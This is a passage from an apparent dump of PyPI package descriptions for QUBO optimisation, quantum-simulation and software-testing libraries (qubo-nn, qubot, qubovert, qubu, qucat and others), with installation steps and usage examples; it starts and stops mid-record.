problem)0.3AddedQUBOSampleclass and sampling methodsfullandgibbs0.4RenamedQUBOSampletoBinarySample; added methods for saving and loading QUBO and Sample instances0.5Movedgibbstomcmcand implemented true Gibbs sampling asgibbs; addednumbaas dependency0.5.1changedkeep_probtokeep_intervalin Gibbs sampling, making the algorithm's runtime deterministic; renamedsampletorandomin QUBO embedding classes, added MAX 2-SAT problem embedding0.6Changed Python version to 3.8; removedbitvecdependency; addedscipydependency required for matrix operations in numba functions0.6.1added scaling and rounding0.6.2removedseedpydependency0.6.3renamedshotstosizeinBinarySample; cleaned up sampling, simplified type hints0.6.4added probabilistic functions toquboclass0.6.5complete empirical prob. 
vector can be returned fromBinarySample0.6.6fixed spectral gap implementation0.6.7movedbrute_forceto new sub-modulesolving; added some approximate solving methods0.6.8addedbitvecsub-module;dynamic_rangenow uses bits by default, changedbits=Falsetodecibel=False; removed scipy from requirements0.6.9new, more memory-efficient save format0.6.10fixed requirements insetup.py; fixed size estimation inqubo.save()0.7Added more efficient brute-force implementation using C extension; added optional dependencies for calculating bounds and ordering distance0.8New embeddings, new solving methods; switched to NumPy random generators fromRandomState; added parameter compression for dynamic range reduction; Added documentation0.8.1some fixes to documentation0.8.2implementedqubo.dx2(); added several new solving heuristics0.8.3added submodulepreprocessingand moved DR reduction there; addedpartial_assignmentclass as replacement ofqubo.clamp(), which is now deprecated0.8.4added fast Gibbs sampling and QUBO parameter training"} +{"package": "qubo-nn", "pacakge-description": "QUBO - NN9 problems and their respective QUBO matrices.QUBO matrices are used to describe an optimization problem as a matrix such that a Quantum Annealer (such as a D-Wave QA) can solve it.Now, these matrices are quite an interesting construct.. Thus, a few questions arise:Is it possible to classify the problem class based on the QUBO matrix?Is it possible to reverse-engineer the problem parameters that led to a QUBO matrix?Let's find out.pip install qubo-nnProject StructureFilePurposedatasets/Contains generated datasets.models/Contains trained models.nn/Contains neural network models.plots/Contains plotting scripts and generated plots.problems/Contains generators and evaluators for specific problems such as 3SAT or TSP.runs/Contains tensorboard logging files.config.pyConfiguration (json) handling.data.pyLMDB data handling.main.pyMain entry point.pipeline.pyEnd to end training and testing of NNs on QUBO matrices.simulations.jsonAll experiments and configurations.Problems implemented so far:Number PartitioningMaximum CutMinimum Vertex CoverSet PackingMaximum 2-SATSet PartitioningGraph ColoringQuadratic AssignmentQuadratic KnapsackMaximum 3-SATTravelling Salesman (TSP)Graph IsomorphismSub-Graph IsomorphismMaximum CliqueSetuppip install qubo-nnORpip3 install -r requirements.txt\npip3 install -e .UsingClassification / Reverse regressionusage: main.py [-h] [-t TYPE] [--eval] [--gendata] [--train] [-c CFG_ID] [-m [MODEL]] [-n [NRUNS]]\n\noptional arguments:\n -h, --help show this help message and exit\n -t TYPE, --type TYPE Type (classify, reverse)\n --eval\n --gendata\n --train\n -c CFG_ID, --cfg_id CFG_ID\n cfg_id\n -m [MODEL], --model [MODEL]\n -n [NRUNS], --nruns [NRUNS]Examples for classification:python3 -m qubo_nn.main -t classify -c 2 --train\npython3 -m qubo_nn.main -t classify -c 2 --eval -m models/21-02-16_20\\:28\\:42-9893713-instances-MacBook-Pro.local-2Examples for reverse regression:python3 -m qubo_nn.main -t reverse -c tsp1 --gendata\npython3 -m qubo_nn.main -t reverse -c tsp1 --train -n 1Generating QUBOs for arbitrary problemsThis is an example on how to create a MaxCut instance and generate a QUBO matrix for it:>>> graph = networkx.Graph([(1, 2), (1, 3), (2, 4), (3, 4), (4, 5), (3, 5)])\n>>> problem = MaxCut(graph)\n>>> matrix = problem.gen_qubo_matrix()\n[\n [2, -1, -1, 0, 0],\n [-1, 2, 0, -1, 0],\n [-1, 0, 3, -1, -1],\n [0, -1, -1, 3, -1],\n [0, 0, -1, -1, 2]\n]The list of problems can be found inqubo_nn/problems/__init__.py. 
Also:\n>>> from qubo_nn.problems import PROBLEM_REGISTRY\n>>> PROBLEM_REGISTRY\n{\n 'NP': ,\n 'MC': ,\n 'MVC': ,\n 'SP': ,\n 'M2SAT': ,\n 'SPP': ,\n 'GC': ,\n 'QA': ,\n 'QK': ,\n 'M3SAT': ,\n 'TSP': ,\n 'GI': ,\n 'SGI': ,\n 'MCQ': \n ...\n}\nResults: The pipeline of interest is as follows. Given some QUBO matrix that was generated using a set of problem parameters, we first classify the problem in step a and then predict the parameters in step b. Classification: Using parameter configuration 100_genX (see simulations.json), the average total misclassification rate over 20 models goes to near zero. The figure includes the 95% confidence interval. Scrambling QUBOs leads to a similar effect. Note that this is using a generalized dataset, i.e. the dataset consists of not just 64x64 QUBO matrices for each problem, but also smaller sizes such as 32x32. The smaller sizes are zero-padded to the biggest supported size, which most of the time is 64x64 and in rare cases goes up to 144x144 (for Quadratic Assignment). The t-SNE plot for this experiment is shown below. Reverse regression: This is preliminary. Some of the problems are easily learned by a neural network regressor. Each line represents 10 models and includes the 95% confidence interval. Reversibility: This shows whether we can deduce the parameters that led to a QUBO matrix, given we predicted the problem beforehand. A lot of the graph-based problems are easily reversible since the graph structure is kept intact in the QUBO matrix. Thus we can recreate the graph and other input parameters given a GraphColoring QUBO matrix. This is still WIP - needs testing. These are hypotheses. Reversing some problems like Quadratic Knapsack might be possible - an algorithmic approach is one idea, but one could also make their life easy and try fitting a NN model to it.\nProblem | Reversibility | Comment\nGraph Coloring | + | Adjacency matrix found in QUBO.\nMaximum 2-SAT | ? | Very complex to learn, but possible? C.f. m2sat_to_bip.py in contrib.\nMaximum 3-SAT | ? | Very complex to learn, but possible?\nMaximum Cut | + | Adjacency matrix found in QUBO.\nMinimum Vertex Cover | + | Adjacency matrix found in QUBO.\nNumber Partitioning | + | Easy, create equation system from the upper triangular part of the matrix (triu).\nQuadratic Assignment | + | Over-determined linear system of equations -> solvable. P does not act as salt. A bit complex to learn.\nQuadratic Knapsack | - | Budgets can be deduced easily (find argmin in first row; this column contains all the budgets). P acts as a salt -> thus not reversible.\nSet Packing | - | Multiple problem instances lead to the same QUBO.\nSet Partitioning | - | Multiple problem instances lead to the same QUBO.\nTravelling Salesman | + | Find a quadrant with non-zero entries (w/ an identical diagonal), transpose, the entries are the distance matrix. Norm result to between 0 and 1.\nGraph Isomorphism | + | Adjacency matrix found in QUBO.\nSub-Graph Isomorphism | + | Adjacency matrix found in QUBO.\nMaximum Clique | + | Adjacency matrix found in QUBO.\nRedundancy of QUBOs with AutoEncoders: The figure below shows that there are major differences between problem classes in terms of their overall redundancy. Contributing: Pull requests are very welcome. Before submitting one, run all tests with ./test.sh and make sure nothing is broken. References:\nGlover, Fred, Gary Kochenberger, and Yu Du. \"A tutorial on formulating and using qubo models.\" arXiv preprint arXiv:1811.11538 (2018).\nMichael J. Dinneen, \"Maximum 3-SAT as QUBO\" https://canvas.auckland.ac.nz/courses/14782/files/574983/download?verifier=1xqRikUjTEBwm8PnObD8YVmKdeEhZ9Ui8axW8HwP&wrap=1\nLucas, Andrew. 
\"Ising formulation of many NP-problems. Frontiers in Physics\" (2014)\nCristian S. Calude, Michael J. Dinneen and Richard Hua. \"QUBO Formulations for the Graph Isomorphism Problem and Related Problems\" (2017)Related WorkHadamard Gate Transformation for 3 or more QuBitsQUBOs for TSP and Maximum-3SATQUBO-NN - Reverse-Engineering QUBO matricesA note on Adiabatic Evolution in Quantum AnnealingQuantum Annealing Hamiltonian Example CalculationList of QUBO formulations (48)"} +{"package": "qubot", "pacakge-description": "\ud83e\udd16 QubotAn autonomous exploratory testing library for Python.AboutQubot was created out of inspiration to create a fully autonomous testing bot to mimic a real-life\nQA-tester.Seethe Qubot paperto learn more about the design decisions and the Q-learning approach behind\nthis repository. Moreover, seeexperiments.ipynbfor the experiment\nmentioned in paper.Hours of painstaking work have been put into this project thus far, and we hope this\nlibrary finds actual use in the field of autonomous software testing.Getting StartedTo get started with Qubot, simply download the library into your project's repository from PyPi:pip install qubotThis will download all necessary dependencies, as well as install thequbotcommand line program\nin your current Python environment.Run ProgrammaticallyYou can specify each aspect of your test programmatically, and run it all within the same code file.from qubot import Qubot, QubotConfigTerminalInfo, QubotConfigModelParameters, QubotDriverParameters, QubotPresetRewardFunc\n\nqb = Qubot(\n url_to_test=\"https://upmed-starmen.web.app/\",\n terminal_info_testing=QubotConfigTerminalInfo(\n terminal_ids=[],\n terminal_classes=[\"SignIn_login_hcp__qYuvP\"],\n terminal_contains_text=[],\n ),\n terminal_info_training=QubotConfigTerminalInfo(\n terminal_ids=[],\n terminal_classes=[],\n terminal_contains_text=[\"Log in as a Healthcare Provider\"],\n ),\n driver_params=QubotDriverParameters(\n use_cache=False,\n max_urls=10,\n ),\n model_params=QubotConfigModelParameters(\n alpha=0.5,\n gamma=0.6,\n epsilon=1,\n decay=0.01,\n train_episodes=1000,\n test_episodes=100,\n step_limit=100,\n ),\n reward_func=QubotPresetRewardFunc.ENCOURAGE_EXPLORATION,\n input_values={\n \"color\": \"#000000\",\n \"date\": \"2021-01-01\",\n \"datetime-local\": \"2021-01-01T01:00\",\n \"email\": \"johndoe@gmail.com\",\n \"month\": \"2021-01\",\n \"number\": \"1\",\n \"password\": \"p@ssw0rd\",\n \"search\": \"query\",\n \"tel\": \"123-456-7890\",\n \"text\": \"text\",\n \"time\": \"00:00:00.00\",\n \"url\": \"https://www.google.com/\",\n \"week\": \"2021-W01\"\n }\n)\nqb.run()\nprint(qb.get_stats())See the source code for descriptions of each configuration property. 
If you'd like to stick with\ndefault values, yourQubotinstantiation may look as short as the following:qb = Qubot(\n url_to_test=\"https://upmed-starmen.web.app/\",\n QubotConfigTerminalInfo(\n terminal_ids=[],\n terminal_classes=[\"SignIn_login_hcp__qYuvP\"],\n terminal_contains_text=[],\n )\n)Run Programmatically via a Configuration FileShorten the Qubot setup code by adding a Qubot configurationJSONfile in the same directory, as follows:qu_config.json{\n\t\"url\": \"https://upmed-starmen.web.app/\",\n\t\"terminal_info\": {\n\t\t\"training\": {\n \"ids\": [],\n \"classes\": [\n \"SignIn_login_hcp__qYuvP\"\n ],\n \"contains_text\": []\n\t\t},\n\t\t\"testing\": {\n \"ids\": [],\n \"classes\": [],\n \"contains_text\": [\n \"Log in as a Healthcare Provider\"\n ]\n\t\t}\n\t},\n\t\"driver_parameters\": {\n\t \"use_cache\": false,\n\t \"max_urls\": 1\n\t},\n\t\"model_parameters\": {\n\t\t\"alpha\": 0.5,\n\t\t\"gamma\": 0.6,\n\t\t\"epsilon\": 1,\n\t\t\"decay\": 0.01,\n\t\t\"train_episodes\": 1000,\n\t\t\"test_episodes\": 100,\n\t\t\"step_limit\": 100\n\t},\n\t\"reward_func\": 3,\n\t\"input_values\": {\n \"color\": \"#000000\",\n \"date\": \"2021-01-01\",\n \"datetime-local\": \"2021-01-01T01:00\",\n \"email\": \"johndoe@gmail.com\",\n \"month\": \"2021-01\",\n \"number\": \"1\",\n \"password\": \"p@ssw0rd\",\n \"search\": \"query\",\n \"tel\": \"123-456-7890\",\n \"text\": \"text\",\n \"time\": \"00:00:00.00\",\n \"url\": \"https://www.google.com/\",\n \"week\": \"2021-W01\"\n\t}\n}Then, run the following code to set up and execute the Qubot tests.main.pyfrom qubot import Qubot\n\nqb = Qubot.from_file('./qu_config.json')\nqb.run()\nprint(qb.get_stats())Run in Command-Line via a Configuration FileQubot is automatically installed to your command line when you runpip install qubot.Assuming you've defined the configuration in./qu_config.json, enter the\nfollowing into your command line to run a test:qubot ./qu_config.jsonThe above will generate an output file calledqu_stats.jsonin the same directory. To change\nthe name of this output file, you can add the--output_file/-oflag:qubot ./qu_config.json -o output_stats.jsonSee this usage statement for more info on the command line utility:usage: qubot [-h] config_file [--output_file OUTPUT_FILE]Retrieving Test StatisticsWhat good is a testing suite without stats?To retrieve output statistics on your latest test run in code, simply callQubot(...).get_stats()This is\nexemplified above.Meanwhile, output statistics will be written to a file (default:qu_stats.json) if using the command line program.Statistics have no defined shape, but generally look like the following:{\n \"elements_encountered\": {\n \"count\": 80,\n \"events\": [\n \" (bccad3ad-f444-c74a-a440-631241a8dfc3)\",\n \" (12bf4d04-00df-2541-8b82-1476d4467471)\",\n \" (768ecfcb-5f5d-6945-96a6-6a8e6884d8a9)\",\n \" (34f6f1d4-7b65-5f4b-b92c-fa5ec96e480d)\",\n ...\n ]\n },\n \"elements_left_clicked\": {\n \"count\": 7,\n \"events\": [\n \"
(ad1272a9-2a5a-2844-b741-39a7fbaf6aff)\",\n ...\n ]\n },\n \"step_count\": 110000,\n \"reward_sum\": -1100000,\n \"training_rewards\": {\n \"count\": 1000,\n \"events\": [\n -1000,\n -2000,\n ...\n ]\n },\n \"epsilon_history\": {\n \"count\": 1000,\n \"events\": [\n 1.0,\n 0.9901493354116764,\n 0.9803966865736877,\n ...\n ]\n },\n \"testing_rewards\": {\n \"count\": 100,\n \"events\": [\n -1000,\n ...\n ]\n },\n \"testing_penalties\": {\n \"count\": 100,\n \"events\": [\n 100,\n ...\n ]\n }\n}AuthorsAnthony KrivonosPortfolio|GitHubKenneth ChuenGitHubCreated for theCOMSE6156 - Topics in Software Engineeringcourse at Columbia University in Spring 2021."} +{"package": "qubovert", "pacakge-description": "The one-stop package for formulating, simulating, and solving problems in boolean and spin form.master branchdev branchpypi distributionPlease see theRepositoryandDocs. For examples/tutorials, see thenotebooks.InstallationExample of the typical workflowCreate the boolean objective function to minimizeSolving the model with bruteforceSolving the model withqubovert\u2019s simulated annealingSolving the model with D-Wave\u2019s simulated annealerManaging QUBO, QUSO, PUBO, PUSO, PCBO, and PCSO formulationsBasic examples of common functionalityConvert common problems to quadratic form (theproblemslibrary)InstallationFor the stable release (same version as themasterbranch):pipinstallqubovertOr to install from source:gitclonehttps://github.com/jtiosue/qubovert.gitcdqubovertpipinstall-e.Then you can use it in Pythonversions 3.6 and abovewithimportqubovertasqvNote that to install from source on Windows you will needMicrosoft Visual C++ Build Tools 14installed.Example of the typical workflowHere we show an example of formulating a pseudo-boolean objective function. We can also make spin objective functions (Hamiltonians) in a very similar manner. See thenotebooksfor examples.Create the boolean objective function to minimizefromqubovertimportboolean_varN=10# create the variablesx={i:boolean_var('x(%d)'%i)foriinrange(N)}# minimize \\sum_{i=0}^{N-2} (1-2x_{i}) x_{i+1}model=0foriinrange(N-1):model+=(1-2*x[i])*x[i+1]# subject to the constraint that x_1 equals the XOR of x_3 and x_5# enforce with a penalty factor of 3model.add_constraint_eq_XOR(x[1],x[3],x[5],lam=3)# subject to the constraints that the sum of all variables is less than 4# enforce with a penalty factor of 5model.add_constraint_lt_zero(sum(x.values())-4,lam=5)Next we will show multiple ways to solve the model.Solving the model with bruteforceBefore using the bruteforce solver, always check thatmodel.num_binary_variablesis relatively small!model_solution=model.solve_bruteforce()print(\"Variable assignment:\",model_solution)print(\"Model value:\",model.value(model_solution))print(\"Constraints satisfied?\",model.is_solution_valid(model_solution))Solving the model withqubovert\u2019s simulated annealingPlease see the definition of PUBO in the next section. We will anneal the PUBO.fromqubovert.simimportanneal_pubores=anneal_pubo(model,num_anneals=10)model_solution=res.best.stateprint(\"Variable assignment:\",model_solution)print(\"Model value:\",res.best.value)print(\"Constraints satisfied?\",model.is_solution_valid(model_solution))Solving the model with D-Wave\u2019s simulated annealerD-Wave\u2019s simulated annealercannot anneal PUBOs as we did above. Instead the model must be reduced to a QUBO. 
See the next section for definitions of QUBO and PUBO.fromnealimportSimulatedAnnealingSampler# Get the QUBO form of the modelqubo=model.to_qubo()# D-Wave accept QUBOs in a different format than qubovert's format# to get the qubo in this form, use the .Q propertydwave_qubo=qubo.Q# solve with D-Waveres=SimulatedAnnealingSampler().sample_qubo(dwave_qubo,num_reads=10)qubo_solution=res.first.sample# convert the qubo solution back to the solution to the modelmodel_solution=model.convert_solution(qubo_solution)print(\"Variable assignment:\",model_solution)print(\"Model value:\",model.value(model_solution))print(\"Constraints satisfied?\",model.is_solution_valid(model_solution))Managing QUBO, QUSO, PUBO, PUSO, PCBO, and PCSO formulationsqubovertdefines, among many others, the following objects.QUBO: Quadratic Unconstrained Boolean Optimization (qubovert.QUBO)QUSO: Quadratic Unconstrained Spin Optimization (qubovert.QUSO)PUBO: Polynomial Unconstrained Boolean Optimization (qubovert.PUBO)PUSO: Polynomial Unconstrained Spin Optimization (qubovert.PUSO)PCBO: Polynomial Constrained Boolean Optimization (qubovert.PCBO)PCSO: Polynomial Constrained Spin Optimization (qubovert.PCSO)Each of the objects has many methods and arbitary arithmetic defined; see the docstrings of each object and thenotebooksfor more info. A boolean optimization model is one whose variables can be assigned to be either 0 or 1, while a spin optimization model is one whose variables can be assigned to be either 1 or -1. Thequbovert.boolean_var(name)function will create a PCBO representing the boolean variable with namename. Similarly, thequbovert.spin_var(name)function will create a PCSO representing the spin variable with namename.There are many utilities in theutilslibrary that can be helpful. Some examples of utility functions are listed here.qubovert.utils.solve_pubo_bruteforce, solve a PUBO by iterating through all possible solutions.qubovert.utils.solve_puso_bruteforce, solve a PUSO by iterating through all possible solutions.qubovert.utils.pubo_to_puso, convert a PUBO to a PUSO.qubovert.utils.puso_to_pubo, convert a PUSO to a PUBO.qubovert.utils.pubo_value, determine the value that a PUBO takes with a particular solution mapping.qubovert.utils.puso_value, determine the value that a PUSO takes with a particular solution mapping.qubovert.utils.approximate_pubo_extrema, approximate the minimum and maximum values that a PUBO can take; the true extrema will lie within these bounds.qubovert.utils.approximate_puso_extrema, approximate the minimum and maximum values that a PUSO can take; the true extrema will lie within these bounds.qubovert.utils.subgraph, create the subgraph of a model that only contains certain given variables.qubovert.utils.subvalue, create the submodel of a model with certain values of the model replaced with values.qubovert.utils.normalize, normalize a model such that its coefficients have a maximum absolute magnitude.Seequbovert.utils.__all__for more. Please note that all conversions between boolean and spin map {0, 1} to/from {1, -1} in that order! This is the convention thatqubovertuses everywhere.The PCBO and PCSO objects have constraint methods; for example, the.add_constraint_le_zeromethod will enforce that an expression is less than or equal to zero by adding a penalty to the model whenever it does not. 
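A minimal sketch of that penalty mechanism (the variables, the inequality and the penalty strength below are illustrative, not taken from the docs):

from qubovert import boolean_var

x0, x1, x2 = boolean_var('x0'), boolean_var('x1'), boolean_var('x2')
model = x0 * x1 - x2

# enforce x0 + x1 + x2 <= 2; the penalty lam is added whenever it is violated
model.add_constraint_le_zero(x0 + x1 + x2 - 2, lam=4)

solution = model.solve_bruteforce()
print(model.is_solution_valid(solution))  # True: the bruteforce minimum satisfies the constraint

Inequality constraints are turned into penalty terms (introducing ancilla bits where needed), so lam should be chosen large enough to dominate the objective.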
The PCBO object also has constraint methods for satisfiability expressions; for example, the .add_constraint_OR method will enforce that the OR of the given boolean expression evaluates to True by adding a penalty to the model whenever it does not. See the docstrings and notebooks for more info. For more utilities on satisfiability expressions, qubovert also has a sat library; see qubovert.sat.__all__. Consider the following 3-SAT example. We have variables x0, x1, x2, x3, labeled by 0, 1, 2, 3. We can create an expression C that evaluates to 1 whenever the 3-SAT conditions are satisfied.\nfrom qubovert.sat import AND, NOT, OR\nC = AND(OR(0, 1, 2), OR(NOT(0), 2, NOT(3)), OR(NOT(1), NOT(2), 3))\n# C = 1 for a satisfying assignment, C = 0 otherwise\n# So minimizing -C will solve it.\nP = -C\nsolution = P.solve_bruteforce()\nBasic examples of common functionality: See the notebooks for many fully worked out examples. Here we will just show some basic and brief examples. The basic building block of a binary optimization model is a Python dictionary. The keys of the dictionary are tuples of variable names, and the values are their corresponding coefficients. For example, in the code block below, model1, model2, and model3 are equivalent.\nfrom qubovert import boolean_var, PUBO\nx0, x1, x2 = boolean_var('x0'), boolean_var('x1'), boolean_var('x2')\nmodel1 = -1 + x0 + 2*x0*x1 - 3*x0*x2 + x0*x1*x2\nmodel2 = {(): -1, ('x0',): 1, ('x0', 'x1'): 2, ('x0', 'x2'): -3, ('x0', 'x1', 'x2'): 1}\nmodel3 = PUBO(model2)\nSimilarly, in the code block below, model1, model2, and model3 are equivalent.\nfrom qubovert import spin_var, PUSO\nz0, z1, z2 = spin_var('z0'), spin_var('z1'), spin_var('z2')\nmodel1 = -1 + z0 + 2*z0*z1 - 3*z0*z2 + z0*z1*z2\nmodel2 = {(): -1, ('z0',): 1, ('z0', 'z1'): 2, ('z0', 'z2'): -3, ('z0', 'z1', 'z2'): 1}\nmodel3 = PUSO(model2)\nLet's take the same model from above (i.e. define model = model1.copy()). Suppose we want to find the ground state of the model subject to the constraints that the sum of the variables is negative and that the product of z0 and z1 is 1. We have to enforce these constraints with a penalty called lam. For now, let's set it as a Symbol that we can adjust later.\nfrom sympy import Symbol\nlam = Symbol('lam')\nmodel.add_constraint_lt_zero(z0 + z1 + z2, lam=lam)\nmodel.add_constraint_eq_zero(z0*z1 - 1, lam=lam)\nNote that constraint methods can also be strung together if you want, so we could have written this as\nmodel.add_constraint_lt_zero(z0 + z1 + z2, lam=lam).add_constraint_eq_zero(z0*z1 - 1, lam=lam)\nThe first thing you notice if you print(model.variables) is that there are now new variables in the model called '__a0' and '__a1'. These are auxiliary or ancilla variables that are needed to enforce the constraints. The next thing to notice if you print(model.degree) is that the model is a polynomial of degree 3. Many solvers (for example D-Wave's solvers) only solve degree-2 models. To get a QUBO or QUSO (which are degree-2 models) from model, simply call the .to_qubo or .to_quso methods, which will reduce the degree to 2 by introducing more variables.\nqubo = model.to_qubo()\nquso = model.to_quso()\nNext let's solve the QUBO and/or QUSO formulations. First we have to substitute a value in for our placeholder symbol lam that is used to enforce the constraints. 
We\u2019ll just uselam=3for now.qubo=qubo.subs({lam:3})quso=quso.subs({lam:3})Here we will useD-Wave\u2019s simulated annealer.fromnealimportSimulatedAnnealingSampler# D-Wave represents QUBOs a little differently than qubovert does.# to get D-Wave's form, use the .Q propertydwave_qubo=qubo.Q# D-Wave represents QUSOs a little differently than qubovert does.# to get D-Wave's form, use the .h property the linear terms and the# .J property for the quadratic termsdwave_linear,dwave_quadratic=quso.h,quso.J# call dwavequbo_res=SimulatedAnnealingSampler().sample_qubo(dwave_qubo)quso_res=SimulatedAnnealingSampler().sample_ising(dwave_linear,dwave_quadratic)qubo_solution=qubo_res.first.samplequso_solution=quso_res.first.sampleNow we have to convert the solution in terms of the QUBO/QUSO variables back to a solution in terms of the original variables. We can then check if the proposed solution satisfies all of the constraints!converted_qubo_solution=model.convert_solution(qubo_solution)print(model.is_solution_valid(converted_qubo_solution))converted_quso_solution=model.convert_solution(quso_solution)print(model.is_solution_valid(converted_quso_solution))Convert common problems to quadratic form (theproblemslibrary)One of the goals ofqubovertis to become a large collection of problems mapped to QUBO and QUSO forms in order to aid the recent increase in study of these problems due to quantum optimization algorithms. Use Python\u2019shelpfunction! I have very descriptive doc strings on all the functions and classes. Please see thenotebooksfor a few more examples as well.See the following Set Cover example.fromqubovert.problemsimportSetCoverfromany_moduleimportqubo_solver# or you can use my bruteforce solver...# from qubovert.utils import solve_qubo_bruteforce as qubo_solverU={\"a\",\"b\",\"c\",\"d\"}V=[{\"a\",\"b\"},{\"a\",\"c\"},{\"c\",\"d\"}]problem=SetCover(U,V)Q=problem.to_qubo()obj,sol=qubo_solver(Q)solution=problem.convert_solution(sol)print(solution)# {0, 2}print(problem.is_solution_valid(solution))# will print True, since V[0] + V[2] covers all of Uprint(obj==len(solution))# will print TrueTo use the QUSO formulation instead:fromqubovert.problemsimportSetCoverfromany_moduleimportquso_solver# or you can use my bruteforce solver...# from qubovert.utils import solve_quso_bruteforce as quso_solverU={\"a\",\"b\",\"c\",\"d\"}V=[{\"a\",\"b\"},{\"a\",\"c\"},{\"c\",\"d\"}]problem=SetCover(U,V)L=problem.to_quso()obj,sol=quso_solver(L)solution=problem.convert_solution(sol)print(solution)# {0, 2}print(problem.is_solution_valid(solution))# will print True, since V[0] + V[2] covers all of Uprint(obj==len(solution))# will print TrueTo see problem specifics, runhelp(qubovert.problems.SetCover)help(qubovert.problems.VertexCover)# etc"} +{"package": "qubox-ufsc", "pacakge-description": "QuBOX UFSC ClientQuBOX is a portable quantum computing simulator developed by Quantuloop\nfor theKet language. Accelerated by GPU, QuBOX has two simulation modes,\nbeing able to simulate more than 30 quantum bits.In partnership with Quantuloop, the Quantum Computing Group - UFSC provides\nfree remote access to a QuBOX simulator. 
You can use this client to access\nthe QuBOX hosted at the Federal University of Santa Catarina (UFSC).Seehttps://qubox.ufsc.brfor more information.Installationpipinstallqubox-ufscUsagefromketimport*# import quantum types and functionsimportqubox_ufsc# import the QuBOX UFSC Client# Request access to the QuBOX UFSCqubox_ufsc.login(name=\"Your Name\",email=\"you_email@example.com\",affiliation=\"Your Affiliation\")# Configure the quantum executionqubox_ufsc.config(mode=\"sparse\",precision=1,)# Every quantum execution after this line will run on the QuBOX################################### Bell State preparation example ###################################a,b=quant(2)cnot(H(a),b)print(dump(a+b).show())"} +{"package": "qubricks", "pacakge-description": "UNKNOWN"} +{"package": "qub-sherlock", "pacakge-description": "sherlockmine a library of historical and on-going astronomical survey data in an attempt to identify the sources of transient/variable events, and predict their classifications based on crossmatched data.Documentation for sherlock is hosted byRead the Docs(development versionandmaster version). The code lives ongithub. Please report any issues you findhere.FeaturesHow to cite sherlockIf you usesherlockin your work, please cite using the following BibTeX entry:@software{Young_sherlock,author={Young, David R.},doi={10.5281/zenodo.8038058},license={GPL-3.0-only},title={{sherlock}},url={https://github.com/thespacedoctor/sherlock}}"} +{"package": "qubu", "pacakge-description": "QuBuQuBu is a simple database query builder for Python.Build statusFeaturesCurrently supported only some of MongoDB's main operators, such as:Logical query operators:$and,$or,$nor,$notComparison query operators:$eq,$gt,$gte,$in,$lt,$lte,$ne,$ninEvaluation query operators:$text,$regexGeospatial query operators:$near,$nearSphereRequirementsPython>=3.6DicMerInstallationpipinstallqubuUsageFollowing Python code:fromqubuimportAnd,Or,Not,Eq,Ne,Gte=Or(And(Eq('foo','bar'),Ne('bar','baz')),Not(Gt('salary',1500)),Eq('allowed',True),)e.compile()will give following object:{'$or':[{'$and':[{'foo':{'$eq':'bar'}},{'bar':{'$ne':'baz'}}]},{'salary':{'$not':{'$gt':1500}}},{'allowed':{'$eq':True}}]}DocumentationWork in progress.Testingpythonsetup.pytestContributingIf you want to contribute to a project and make it better, your help is very\nwelcome. Contributing is also a great way to learn more about social coding on\nGithub, new technologies and and their ecosystems and how to make constructive,\nhelpful bug reports, feature requests and the noblest of all contributions:\na good, clean pull request.Create a personal fork of the project on Github.Clone the fork on your local machine. Your remote repo on Github is calledorigin.Add the original repository as a remote calledupstream.If you created your fork a while ago be sure to pull upstream changes into\nyour local repository.Create a new branch to work on. Branch fromdevelopif it exists, else frommaster.Implement/fix your feature, comment your code.Follow the code style of the project, including indentation.If the project has tests run them.Write or adapt tests as needed.Add or change the documentation as needed.Squash your commits into a single commit with git's interactive rebase. Create\na new branch if necessary.Push your branch to your fork on Github, the remoteorigin.From your fork open a pull request in the correct branch. 
Target the project'sdevelopbranch if there is one, else go formaster.If the maintainer requests further changes just push them to your branch.Once the pull request is approved and merged you can pull the changes fromupstreamto your local repo and delete your extra branch(es).And last but not least: Always write your commit messages in the present tense.\nYour commit message should describe what the commit, when applied, does to the\ncode \u2013 not what you did to the code.RoadmapWrite documentation.SQL expressions support.SupportIf you have any issues or enhancement proposals feel free to report them via\nproject'sIssue Tracker.AuthorsOleksandr Shepetko-- initial work.CreditsNoneLicenseThis project is licensed under the MIT License. See theLICENSE.mdfile for details."} +{"package": "qucat", "pacakge-description": "QUCAT: QUantum Circuit Analyzer Tool.Seehttps://qucat.org/for installation, documentation, tutorials and more."} +{"package": "qucat-cover", "pacakge-description": "QuCAT: A Combinatorial Testing Tool for Quantum SoftwareDescriptionWith the increased developments in quantum computing, the availability of systematic and automatic testing approaches for quantum programs is becoming more and more essential. To this end, we present the quantum software testing tool QuCAT for combinatorial testing of quantum programs. QuCAT provides two functionalities of use. With the first functionality, the tool generates a test suite of a given strength (e.g., pair-wise). With the second functionality, it generates test suites with increasing strength until a failure is triggered or a maximum strength is reached. QuCAT uses two test oracles to check the correctness of test outputs. We assess the cost and effectiveness of QuCAT with 3 faulty versions of 5 quantum programs. Results show that combinatorial test suites with a low strength can find faults with limited cost, while a higher strength performs better to trigger some difficult faults with relatively higher cost.InstallationInstall Anaconda. You can download Anaconda for your OS fromhttps://www.anaconda.com/Install PICT. You can download PICT for your OS fromhttps://github.com/Microsoft/pictIf you add it into system variable, you don't need to specify PICT root in the configuration file introduced laterCreate a conda environment (e.g., with name \"qucat\"):conda create -n qucat python=3.9Activate the environment and install Qiskit and rpy2conda activate qucat\npip install qucat-coverHow to use QuCAT?Quantum Program FileThe quantum program should be written with Qiskit.The code has to be structured in a function named as 'run' with one parameter that refers to the quantum circuit.Users only need to add gates to the circuit and measure output qubits to get the output. 
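For illustration only, a 'run' function of the kind described here might look like the following hypothetical sketch (the gates and measured qubits are placeholders, not the sample program referenced below, and it assumes the circuit handed in by QuCAT already provides the classical bits needed for measurement):

```python
# Hypothetical 2-qubit example of the required 'run' function; QuCAT supplies the circuit.
def run(qc):
    qc.h(0)           # add gates to the circuit...
    qc.cx(0, 1)
    qc.measure(1, 0)  # ...and measure the output qubit into a classical bit
```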
They don't need to set any register, initialize circuits, choose the simulation, or execute the circuits in 'run' function.A sample quantum program is availablehere.Configuration FileThe configuration file should be written in an INI file.\nThe configuration file is described below.[program]\nroot= \n;(Required)\n;Description: The absolute root of your quantum program file.\nnum_qubit= \n;(Required)\n;Description: The total number of qubit of your quantum program.\ninputID= \n;(Required)\n;Description: The IDs of input qubits.\n;Format: A non-repeating sequence separated by commas.\noutputID= \n;(Required)\n;Description: The IDs of output qubits which are the qubits to be measured.\n;Format: A non-repeating sequence separated by commas\n\n[qucat_configuration]\npict_root=\n;(Optional)\n;Description: The absolute root to run pict. If the root is added to system variable, users don't need to specify it. pict_root='.' by default.\nk=\n;(Optional)\n;Description: Order of combinations. In Functionality Two, it refers to the maximum value of strength. o = 2 by default. \nsignificance_level=\n;(Optional)\n;Description: The significance 